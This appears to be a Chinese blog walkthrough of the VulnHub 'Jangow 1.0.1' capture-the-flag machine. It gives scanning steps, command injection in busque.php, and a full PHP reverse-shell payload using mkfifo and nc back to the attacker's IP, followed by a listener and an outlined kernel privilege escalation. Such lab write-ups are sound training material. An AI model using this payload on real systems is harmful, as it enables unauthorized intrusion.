本文描述了作者通过参与CTF比赛过程中的渗透测试,逐步扫描、发现靶机漏洞,利用HTTP注入获取反弹shell权限的过程。涉及的工具和技术包括ARP扫描、Nmap、uname-a检查和Antique漏洞利用。
近期比较忙,一直在打CTF,所以博客写的比较简略,各位师傅看看思路就行,有些地方也没写到,不必太在意。
下载地址:https://www.vulnhub.com/entry/jangow-101,754/
攻击机192.168.159.4
靶机192.158.159.5
1.扫描IP地址,得到靶机的IP
arp-scan -l
2.得到靶机的ip,扫描其端口信息
nmap -A 192.168.159.5
3.发现80端口还开着http,去浏览器打开
尝试几次后发现一个可能存在漏洞的地方
4.尝试输入uname -a 发现可以
5.因此直接在后面写一句话木马
http://192.168.159.5/site/busque.php?buscar=<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.159.4 443 >/tmp/f");?>
可以看到已经写进去了(端口多试几个,很多常用的都被关了)
6.打开监听端口
nc -lvp 443
7.前端访问shell.php文件,实现反弹shell
8.成功获得权限,查看本机信息和系统版本
lsb_release-a
9.查看这一版本所存在的漏洞并下载
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
10.使用蚁剑进行上传
11.下载漏洞并执行
12.成功提权
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
